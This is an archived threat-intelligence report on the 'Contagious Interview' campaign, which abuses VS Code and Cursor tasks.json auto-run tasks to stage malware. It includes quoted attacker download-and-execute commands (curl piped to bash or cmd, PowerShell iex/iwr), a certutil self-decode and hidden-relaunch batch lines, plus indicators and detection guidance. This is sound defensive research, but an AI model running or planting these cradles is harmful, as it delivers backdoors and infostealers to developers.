{ "id": "3842a616-378f-424e-97c6-83aa46af7eab", "created_at": "2026-04-06T00:17:52.975781Z", "updated_at": "2026-04-10T13:12:45.195422Z", "deleted_at": null, "sha1_hash": "3c5310b71d1e6948dd17e94a8b2708d4bb9e5743", "title": "Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 1", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2923665, "plain_text": "Contagious Interview: Evolution of VS Code and Cursor Tasks\r\nInfection Chains - Part 1\r\nBy Abstract Security Threat Research Organization (ASTRO)\r\nPublished: 2026-03-02 · Archived: 2026-04-05 13:54:23 UTC\r\n2/27/2026 - Note: we have made revisions to this post to clarify findings and separate speculative\r\nanalysis.\r\nSummary\r\nAbstract customers already have visibility into the behaviors described in this report.\r\nThe ASTRO team has been actively tracking Contagious Interview techniques that abuse task auto-execution in\r\nintegrated development environments (IDEs) such as Microsoft Visual Studio Code (VSCode) and Cursor to\r\ndeliver malware. Since our last report on the tasks infection vector, we have observed a number of new payload\r\nstagers using short URLs, GitHub Gists, Google Drive, and some interesting custom domains. We have also seen a\r\nresurgence of previously reported infection chains and tooling now combined with the IDE tasks vector.\r\nFindings\r\nNew Payload Stagers\r\nIn the last report, we noted heavy use of Vercel URLs for payload staging referenced directly in tasks.json files\r\nalong with a handful of custom domains. While stagers hosted on Vercel continue to be prevalent (though many\r\nhave been taken down), we have observed an increase in alternative staging servers used in the tasks commands\r\nand in later stages of the infection chains.\r\nThis GitHub Code search query returns a variety of new stagers while filtering out Vercel URLs that would make\r\nup the majority of results:\r\npath:tasks.json runOn folderOpen (curl OR wget OR iwr) (cmd OR \"| sh\" OR \\\"bash\\\" OR \\\"powershell\\\"\r\nOR iex) NOT vercel\r\nGitHub Gists\r\nRecently, repos with tasks.json files were created with the same pattern of curl or other downloaders\r\nfetching scripts piped directly to shell, but in these cases the scripts were hosted in GitHub Gists. This query\r\nreturns 2 repos with this pattern, each targeting both VS Code and Cursor users:\r\npath:tasks.json runOn folderOpen \"gist.githubusercontent\"\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 1 of 18\n\nHere is a sample command run from bash -c in Wisepanda-bot-main/.cursor/tasks.json:\r\ncurl -sL https://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.sh | bash\r\nThese files also have a variation for Windows using PowerShell instead of piping to cmd as previously seen, like\r\nso:\r\niex(iwr 'https://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1' -UseBasicParsing)\r\nThe gist user cuda-toolkit and script file names like cuda_toolkit_sim_v12.4.ps1 and\r\nmetal_pytorch_sim_v2.3.0.sh are an attempt to masquerade as NVIDIA software, a tactic that Contagious\r\nInterview actors are known to use. This may be a recurring theme due to the intended campaign targets, typically\r\nsoftware developers in DeFi and other cryptocurrency-related industries that are more likely to use high-performance GPUs.\r\nThe Gist-hosted scripts download next-stage payloads from the domain camdriver[.]pro , another attempt at\r\nmimicking NVIDIA software by posing as related to camera drivers. Depending on the target platform, the\r\npayload URLs are formatted like https://camdriver[.]pro/realtekwin.update?r=7205d529-ff14-4dcf-965b-https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 2 of 18\n\n29d500663a75 or https://camdriver[.]pro/realtekmac.sh?r=7205d529-ff14-4dcf-965b-29d500663a75 and\r\ndrop ZIP files that lead to malware installation downstream.\r\nWhile these gists have since been deleted, these few cases might indicate future continued use of\r\ngist[.]githubusercontent[.]com for payload URLs in tasks commands. The actual scripts we pulled before\r\ndeletion and their subsequent chains eventually lead to deployment of Go/Python backdoors dubbed by ESET\r\nWeLiveSecurity as WeaselStore. These previously analyzed backdoors represent a combination of older,\r\ndocumented Contagious Interview TTPs with the more recent tasks.json infection vector. More on this will be\r\ncovered in Part 2 of this report.\r\nURL Shorteners\r\nWe have also seen use of URLs shortened by short[.]gy hosting scripts downloaded and executed in tasks files.\r\nMost if not all of these URLs point to the Vercel domain josehub88[.]vercel[.]app , suggesting that the actors\r\nstarted using URL shorteners as a means to reduce their footprint of Vercel servers, perhaps due to the extensive\r\nreporting around this aspect.\r\nThe search query for this is straightforward. As of this reporting, 22 files containing these shortened URLs are\r\nreturned.\r\npath:tasks.json runOn folderOpen \"short.gy\"\r\nNotably, many of these files feature whitespace padding of the malicious commands to move them off-screen\r\nfrom view. This cheap evasion technique was seen in our previous report from late January.\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 3 of 18\n\nGoogle Drive\r\nThe Contagious Interview actors have published and continue to publish malicious Node Package Manager\r\n(NPM) packages, many of which have been identified by the DPRK npm packages tracker. One package in\r\nparticular, \"eslint-validator\" (created by user lincoln0809), can be found in the package.json dependencies of 3\r\nGitHub repos using this query:\r\npath:package.json \"\\\"eslint-validator\\\"\"\r\nMalicious package dependencies in repositories is a common pattern, but interestingly in the case of this package,\r\nit runs content fetched from the Google Drive URL\r\nhttps://drive[.]google[.]com/file/d/16AaeeVhqj4Q6FlJIDMgdWASJvq7w00Yc/view?usp=sharing , found in\r\ncore.js . The containing file itself is executed using node via an install script in the package's package.json .\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 4 of 18\n\nThe code for handling the content download from the Drive link can be found in googleDrive.js . It performs a\r\nGET request using the fetch API and handles virus-scan warning pages by falling back to an alternative URL\r\nendpoint in the format of https://drive[.]usercontent[.]google[.]com/download?\r\nid=${fileId}\u0026export=download\u0026confirm=t .\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 5 of 18\n\nIt is worth noting that the code to download and execute content from Google Drive was not present in the initial\r\nversion of the \"eslint-validator\" package, and was added in a later version.\r\nThe Google Drive link hosts inject-simple.min0.js (4.5k), which contains heavily obfuscated JavaScript with\r\npreviously seen patterns suggesting a ChainedDown (JADESNOW) downloader component.\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 6 of 18\n\nThe use of Google Drive as a stager was also recently reported by kmsec.uk.\r\n(Speculative) A Copycat Actor?\r\nThis section has been adjusted to clarify that the following finding, while sharing techniques and\r\npatterns with previously documented Contagious Interview infection chains, may be a copycat or test\r\nby an unrelated actor and therefore is not confirmed to be part of the same campaign. This is largely\r\ndue to the discovery that the chain results in Akira Stealer, a malware family not known to be used by\r\nContagious Interview actors.\r\nPossibly Unrelated Chain Shares Similar Techniques\r\nIn analyzing suspicious tasks.json files across GitHub, we encountered a tasks file in the repo\r\nadadsws/shannon, which is a malicious fork of the Keygraph Shannon AI penetration testing framework.\r\nThe tasks file executes the following command targeting Windows only:\r\ncurl https://nomgwenya[.]co[.]za/js/settings?win=32 | cmd\r\nThis downloads and executes a batch script captured in this URLScan result and shown below.\r\nThe next stage is another batch script from https://nomgwenya[.]co[.]za/js/bootstrap?win=32 written to the\r\nfile %USERPROFILE%\\.vscode\\vscode-bootstrap.cmd . The full content of this script can be found in this URLScan\r\nresult.\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 7 of 18\n\nThe script begins by re-launching itself in a hidden window if it was not already started with a _restarted\r\nargument:\r\nif \"%~1\" neq \"_restarted\" powershell -WindowStyle Hidden -Command \"Start-Process -FilePath cmd.exe -\r\nArgumentList '/c \\\"%~f0\\\" _restarted' -WindowStyle Hidden\" \u0026 exit /b\r\nThe script then obtains a Node.js runtime needed to execute an embedded JavaScript payload. It checks for a\r\nglobal install via where node and, if not found, downloads the latest Node.js MSI from nodejs.org and\r\nextracts it portably with msiexec /a . The MSI file is then deleted.\r\nOnce Node.js is available, the script changes its working directory to %USERPROFILE%\\.vscode , positioning its\r\nsubsequent file operations alongside legitimate VS Code configuration files.\r\nUp until this point, a number of patterns coincide with previously observed Contagious Interview techniques:\r\nThe repo adadsws/shannon README is modified with LLM-generated content.\r\nThe repo contains a .vscode/tasks.json backdoor that runs on folder open.\r\nThe tasks file contains the label \"env\" which has been observed in multiple Contagious Interview-linked\r\ntasks files.\r\nThe task command is a download cradle piped to cmd and has a URL containing /settings with a ?\r\nwin=32 parameter.\r\nThe loaders have been used in Contagious Interview before, such as in the first and second stage batch files\r\nof a previously seen tasks.json chain that leveraged TxDataHiding. These contain similar logic for hidden\r\nwindow re-launch and portable Node.js usage.\r\nHowever...\r\nA Twist in this Loader Has an Unexpected Outcome\r\nWhile the loaders seem near-identical to those used in Contagious Interview, they differ in the execution of the\r\nthird stage, which in Contagious Interview infection chains is often Base64-encoded JavaScript decoded and run\r\ndirectly using Node.js.\r\nInterestingly in this case, at the bottom of the batch file is a block of Base64-encoded JavaScript wrapped in PEM\r\ncertificate headers (\"-----BEGIN CERTIFICATE-----\" ... \"-----END CERTIFICATE-----\"), masquerading as an\r\nembedded certificate. The script uses certutil , a commonly abused Windows utility, to decode itself:\r\ncertutil -f -decode \"%~f0\" \"%TMP_JS%\" \u003enul 2\u003e\u00261\r\nThe %~f0 reference points to the currently executing batch file. certutil -decode recognizes the PEM headers\r\nin the file and extracts the Base64 content between them, writing the decoded JavaScript to a randomly named\r\ntemp file at %TEMP%\\script_%RANDOM%.mjs . The .mjs extension has Node.js treat the file as an ES module,\r\nwhich the payload requires based on its imports.\r\nThe decoded script is then executed with the previously obtained Node.js runtime. A long encoded string is passed\r\nas a command-line argument which, as we'll see shortly, is forwarded to a later stage via an environment variable.\r\nAfter execution, the temp file is deleted.\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 8 of 18\n\nUpon decoding the JavaScript payload we're greeted with an anti-debugging trick using (function()\r\n{}).constructor(\"debugger\")() wrapped in a try/catch.\r\nThe rest of the payload is a custom stack-based bytecode VM. Two encrypted blobs are decrypted with a rolling\r\nXOR cipher, one as bytecode and the other as a string table. The VM implements ~30 opcodes and makes Node.js\r\nmodules available to the bytecode as numbered registers.\r\nPossibly Unrelated Chain Deploys Akira Stealer\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 9 of 18\n\nDecrypting the string table and disassembling the bytecode unearths some strings that reveal the next stage:\r\nExtracted strings\r\nhxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip\r\npythonw.exe\r\nexec.py\r\nspawn\r\ndetached\r\nREALTEKAUDIO\r\nPROCNAME\r\nThe bytecode downloads python3.zip from hxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip to the system temp directory, then extracts the ZIP and spawns the extracted\r\npythonw.exe (the windowless Python interpreter) with exec.py as a detached process. Reconstructed from the\r\nbytecode, the spawn call is equivalent to:\r\nchild_process.spawn(pythonw_path, [exec_py_path], {\r\n detached: true,\r\n stdio: 'ignore',\r\n env: { ...process.env, REALTEKAUDIO: process.argv[2], PROCNAME: \"Main\" }\r\n});\r\nThe REALTEKAUDIO environment variable carries the encoded command-line argument from the batch script\r\nthrough to the Python payload, masquerading as Realtek audio software. Additionally, the path .well-known/pki-validation/ in the download URL mimics a location commonly used for PKI validation.\r\nThe Python payload is protected with PyArmor and was recently compiled just before this report release.\r\nRemoving the PyArmor protection and analyzing the underlying Python code reveals a Go-based variant of Akira\r\nStealer, a commodity malware-as-a-service (MaaS) infostealer that exfiltrates user data from browsers,\r\ncryptocurrency wallets, chat applications, and system files.\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 10 of 18\n\nThe associated indicators have been reported by Elastic Security Labs. In January 2026, a similar distribution of\r\nAkira Stealer was reported masquerading as a custom tool on GitHub.\r\nThe discovery of Akira Stealer complicates attribution for this particular infection chain. While the earlier stages\r\nshare many techniques and patterns with previously documented Contagious Interview chains, Akira Stealer is not\r\nknown to be used by Contagious Interview actors to our knowledge. It is possible that this is a separate actor\r\ncopying techniques and swapping in a different final stage. As such, this chain's attribution remains uncertain, but\r\nits details are included in this post due to the shared techniques and infection vector.\r\nDetection Opportunities\r\nVS Code/Cursor child process activity. Monitor for IDEs spawning shell processes running curl , wget ,\r\nPowerShell download commands, or similar utilities (optionally including piped execution) shortly after process\r\nstart.\r\nGitHub Gist URLs in IDE task files. Monitor for gist.githubusercontent.com URLs in\r\n.vscode/tasks.json or .cursor/tasks.json files, particularly combined with curl , wget , iwr , or piped\r\nexecution.\r\nURL shorteners in IDE task files. Flag tasks.json files containing shortened URLs from services like\r\nshort[.]gy . Shorteners obscure the destination and have no legitimate use in IDE task configurations.\r\nPowerShell suspicious arguments in IDE task files. Tasks.json commands invoking PowerShell with -\r\nExecutionPolicy Bypass combined with -WindowStyle Hidden and iex / iwr .\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 11 of 18\n\nGoogle Drive downloads from non-browser processes. Alert on drive.google.com or\r\ndrive.usercontent.google.com requests initiated by non-browser processes like node or npm. Google Drive\r\nURLs in the format https://drive[.]usercontent[.]google[.]com/download?\r\nid=${fileId}\u0026export=download\u0026confirm=t are particularly suspicious as they indicate attempts to bypass virus\r\nscan warning pages.\r\nDownloaded content piped to shell. Most tasks.json commands download and immediately execute scripts.\r\nMonitor for download utilities like curl or wget piped directly to shell commands.\r\nBatch scripts written to the .vscode directory. The user .vscode directory normally contains configuration\r\nfiles. Creation of .cmd or .bat files in %USERPROFILE%\\.vscode\\ is unusual and may indicate malicious\r\nactivity.\r\nConsole clearing around payload execution. A first-stage batch script in one of the infection chains uses cls\r\ncommands before and after executing the downloaded loader to clear evidence from the console window. While\r\ncls alone is benign, its overuse especially surrounding download utilities or script execution in batch files is\r\nsuspicious.\r\nHidden window re-launch with sentinel argument. Detect cmd.exe processes that spawn powershell -\r\nWindowStyle Hidden which in turn spawns another cmd.exe -WindowStyle Hidden , particularly when the\r\ncommand line includes a re-launch sentinel argument (e.g., _restarted ). This double-hidden pattern is\r\ndistinctive and unlikely in legitimate use.\r\nPortable Node.js extraction via msiexec. msiexec /a performing an administrative install of a Node.js MSI to\r\na user-writable directory such as .vscode or %TEMP% is unusual.\r\nThe following detections are based on an infection chain with shared techniques but unconfirmed\r\nconnection to Contagious Interview.\r\ncertutil decoding batch scripts. certutil -f -decode where the source file is a .cmd or .bat — especially\r\nwhen the source is %~f0 (self-reference). Legitimate certutil usage targets certificate files or encoded data files,\r\nnot scripts.\r\nNode.js executing temporary .mjs files. node.exe executing .mjs files from %TEMP% with randomized\r\nfilenames matching patterns like script_%RANDOM%.mjs .\r\npythonw.exe spawned from temp directories. pythonw.exe running from %TEMP%\\python3\\ or similar temp\r\nsubdirectories, especially as a detached process. This can indicate a dropped Python runtime rather than a standard\r\ninstallation.\r\nNode.js spawning Python with suspicious environment variables. Process chain where node.exe spawns\r\npythonw.exe . While this could be legitimate activity, it could warrant closer inspection when paired with other\r\nindicators.\r\nNetwork requests to .well-known paths returning unusual content. HTTP requests to .well-known/pki-validation/ paths that return ZIP files or other unexpected content. This path is not commonly intended for file\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 12 of 18\n\nhosting.\r\nConclusion\r\nContagious Interview actors continue to evolve their infrastructure and techniques. The shift toward GitHub Gists,\r\nURL shorteners, and Google Drive for payload staging suggests the actors are actively adapting to community\r\nreporting and platform takedowns. In Part 2, we will take a closer look at the infection chains covered in this\r\nreport among other findings.\r\nAppendix\r\nGitHub Search Queries\r\nPurpose Query\r\nTasks with non-Vercel\r\nstagers\r\npath:tasks.json runOn folderOpen (curl OR wget OR iwr) (cmd OR \"| sh\" OR\r\n\\\"bash\\\" OR \\\"powershell\\\" OR iex) NOT vercel\r\nTasks referencing GitHub\r\nGists\r\npath:tasks.json runOn folderOpen \"gist.githubusercontent\"\r\nTasks using URL\r\nshortener\r\npath:tasks.json runOn folderOpen \"short.gy\"\r\nRepos with eslint-validator\r\ndependency\r\npath:package.json \"\\\"eslint-validator\\\"\"\r\nIndicators\r\nDomains\r\nDomain Description\r\nshort[.]gy URL shortener used to hide Vercel stagers\r\njosehub88[.]vercel[.]app short[.]gy redirect destination\r\ncamdriver[.]pro Payload delivery from GitHub Gists chains\r\nnomgwenya[.]co[.]za (Possibly unrelated to campaign) Batch script delivery\r\npostprocesser[.]com (Possibly unrelated to campaign) PyArmor-protected Python malware delivery\r\nURLs\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 13 of 18\n\nURL Description\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.shGist-hosted stager\r\n(macOS/Linux)\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/4ece7a2e99311a4aa384c24733b7a41b/raw/metal_pytorch_sim_v2.3.0.shGist-hosted stager\r\n(macOS/Linux)\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1Gist-hosted stager\r\n(Windows)\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/384410c927451dbada9ecb0072851198/raw/cuda_toolkit_sim_v12.4.ps1Gist-hosted stager\r\n(Windows)\r\nhxxps://camdriver[.]pro/realtekwin.update?r=7205d529-ff14-4dcf-965b-29d500663a75\r\nNext stage\r\nWindows payload\r\nURL in Gist-based stagers\r\nhxxps://camdriver[.]pro/realtekwin.update?r=ffa752c6-84e9-4bb9-b3c8-a3ab09cbcbe6\r\nNext stage\r\nWindows payload\r\nURL in Gist-based stagers\r\nhxxps://camdriver[.]pro/realtekmac.sh?r=7205d529-ff14-4dcf-965b-29d500663a75\r\nNext stage *nix\r\npayload URL in\r\nGist-based stagers\r\nhxxps://drive[.]google[.]com/file/d/16AaeeVhqj4Q6FlJIDMgdWASJvq7w00Yc/view?\r\nusp=sharing\r\nGoogle Drive-hosted inject-simple.min0.js\r\n(ChainedDown\r\naka JADESNOW)\r\nhxxps://nomgwenya[.]co[.]za/js/settings?win=32\r\n(Possibly\r\nunrelated to\r\ncampaign) First-stage batch script\r\nhxxps://nomgwenya[.]co[.]za/js/bootstrap?win=32\r\n(Possibly\r\nunrelated to\r\ncampaign)\r\nSecond-stage\r\nloader (vscode-bootstrap.cmd)\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 14 of 18\n\nURL Description\r\nhxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip\r\n(Possibly\r\nunrelated to\r\ncampaign)\r\nBundled Python\r\nruntime and\r\nPyArmor payload\r\nHashes\r\nSHA-256 Hash Description\r\n2a7e7b76a3e8070410adce9b6a2b9cf112687922792c91be563c20fbf6a4a82f\r\nGoogle Drive-hosted inject-simple.min0.js\r\n(ChainedDown aka\r\nJADESNOW)\r\n6d9379e365a4da282531d7f234c69eefa48567c01ba173b462e907a1ddfc71b2\r\n(Possibly unrelated to\r\ncampaign) Bundled Python\r\nruntime and PyArmor\r\npayload\r\nFile Paths and Artifacts\r\nArtifact Description\r\n%USERPROFILE%\\.vscode\\vscode-bootstrap.cmd\r\nSecond-stage loader written to .vscode directory\r\n%TEMP%\\script_*.mjs\r\n(Possibly unrelated to campaign) Certutil-decoded\r\nJavaScript payload\r\n%TEMP%\\py.zip\r\n(Possibly unrelated to campaign) ZIP archive containing\r\nPython runtime and PyArmor payload\r\n%TEMP%\\python3\\exec.py\r\n(Possibly unrelated to campaign) PyArmor-protected Python\r\npayload\r\nREALTEKAUDIO\r\n(Possibly unrelated to campaign) Environment variable\r\npassing encoded data to Python stage\r\nGitHub Repositories\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 15 of 18\n\nRepository Description\r\nItsmeBlackOps/Wisepanda-bot-main Contains tasks.json with download cradles using Gist URLs\r\nBT-AURA/Auto-Stacking Contains tasks.json with download cradles using Gist URLs\r\nicode4fuud/deploy-cloudrun Has package.json with malicious \"eslint-validator\" dependency\r\nicode4fuud/copilot-sdk Has package.json with malicious \"eslint-validator\" dependency\r\nNaboni/CartPanda Has package.json with malicious \"eslint-validator\" dependency\r\nPavel-Shcherbo/defiguard-dev Contains tasks.json with download cradles using short[.]gy URL\r\nannasudol/Web3Aggregator Contains tasks.json with download cradles using short[.]gy URL\r\n0xroaman-2/Royal Contains tasks.json with download cradles using short[.]gy URL\r\nicecoldjay/bri Contains tasks.json with download cradles using short[.]gy URL\r\ngitOxentrolance/hireonchain Contains tasks.json with download cradles using short[.]gy URL\r\nishanrt119/NFT-Marketplace Contains tasks.json with download cradles using short[.]gy URL\r\nhellomanishahere/NFT-Marketplace Contains tasks.json with download cradles using short[.]gy URL\r\nMindshare-Solution-Tech/card-activity\r\nContains tasks.json with download cradles using short[.]gy URL\r\nmindshare-solution-collect/card-activity\r\nContains tasks.json with download cradles using short[.]gy URL\r\nmdimran29/card-activity Contains tasks.json with download cradles using short[.]gy URL\r\nartickc/card-activity Contains tasks.json with download cradles using short[.]gy URL\r\nSatAi999/card-activity Contains tasks.json with download cradles using short[.]gy URL\r\nOvaisKhanday/card-activity Contains tasks.json with download cradles using short[.]gy URL\r\nDevba/W3agregador Contains tasks.json with download cradles using short[.]gy URL\r\nTechProsA/W3GLFun-smartcontracts Contains tasks.json with download cradles using short[.]gy URL\r\nMaxEdgr/P12 Contains tasks.json with download cradles using short[.]gy URL\r\nbohdan0219/nft_project Contains tasks.json with download cradles using short[.]gy URL\r\nbohdan0219/smart_contract Contains tasks.json with download cradles using short[.]gy URL\r\nadadsws/shannon\r\n(Possibly unrelated to campaign) Malicious fork with tasks.json\r\ndownloader\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 16 of 18\n\nAssociated Users\r\nUser Description\r\ncuda-toolkit Deleted Gist account hosting payloads masqueraded as NVIDIA software\r\nlincoln0809 NPM user, published malicious \"eslint-validator\" package\r\nItsmeBlackOps Owner of Wisepanda-bot-main repo\r\nBT-AURA Owner of Auto-Stacking repo\r\nicode4fuud Owner of deploy-cloudrun and copilot-sdk repos\r\nNaboni Owner of CartPanda repo\r\nPavel-Shcherbo Owner of defiguard-dev repo\r\nannasudol Owner of Web3Aggregator repo\r\n0xroaman-2 Owner of Royal repo\r\nicecoldjay Owner of bri repo\r\ngitOxentrolance Owner of hireonchain repo\r\nishanrt119 Owner of NFT-Marketplace repo\r\nhellomanishahere Owner of NFT-Marketplace repo\r\nMindshare-Solution-Tech Owner of card-activity repo\r\nmindshare-solution-collect Owner of card-activity repo\r\nmdimran29 Owner of card-activity repo\r\nartickc Owner of card-activity repo\r\nSatAi999 Owner of card-activity repo\r\nOvaisKhanday Owner of card-activity repo\r\nDevba Owner of W3agregador repo\r\nTechProsA Owner of W3GLFun-smartcontracts repo\r\nMaxEdgr Owner of P12 repo\r\nbohdan0219 Owner of nft_project and smart_contract repos\r\nadadsws (Possibly unrelated to campaign) Owner of malicious shannon fork\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 17 of 18\n\nMalicious NPM Packages\r\nPackage Description\r\neslint-validator Fetches and executes content from Google Drive\r\nSource: https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains" ], "report_names": [ "contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "8c8fea8c-c957-4618-99ee-1e188f073a0e", "created_at": "2024-02-02T02:00:04.086766Z", "updated_at": "2026-04-10T02:00:03.563647Z", "deleted_at": null, "main_name": "Storm-1567", "aliases": [ "Akira", "PUNK SPIDER", "GOLD SAHARA" ], "source_name": "MISPGALAXY:Storm-1567", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84", "created_at": "2024-04-24T02:00:49.516358Z", "updated_at": "2026-04-10T02:00:05.309426Z", "deleted_at": null, "main_name": "Akira", "aliases": [ "Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius" ], "source_name": "MITRE:Akira", "tools": [ "Mimikatz", "PsExec", "AdFind", "Akira _v2", "Akira", "Megazord", "LaZagne", "Rclone" ], "source_id": "MITRE", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434672, "ts_updated_at": 1775826765, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3c5310b71d1e6948dd17e94a8b2708d4bb9e5743.pdf", "text": "https://archive.orkl.eu/3c5310b71d1e6948dd17e94a8b2708d4bb9e5743.txt", "img": "https://archive.orkl.eu/3c5310b71d1e6948dd17e94a8b2708d4bb9e5743.jpg" } }